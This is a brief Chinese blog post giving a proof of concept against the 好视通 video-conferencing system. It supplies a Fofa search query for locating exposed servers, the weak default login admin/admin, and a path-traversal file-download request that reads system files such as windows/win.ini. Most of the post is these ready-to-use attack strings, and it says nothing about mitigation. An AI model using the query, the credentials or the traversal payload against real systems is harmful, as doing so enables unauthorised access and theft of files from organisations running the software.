好视通-视频会议存在弱口令&任意文件下载漏洞

描述

系统存在弱口令和任意文件下载漏洞

Fofa

app="好视通-视频会议"

弱口令

POC

admin/admin

登录界面

登录成功

任意文件下载

POC

/register/toDownload.do?fileName=敏感文件路径
（https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini）

参考

https://www.adminxe.com/2228.html

posted @ 2021-04-18 12:11 追得上的梦想阅读(1352) 评论(0) 编辑收藏举报

刷新页面返回顶部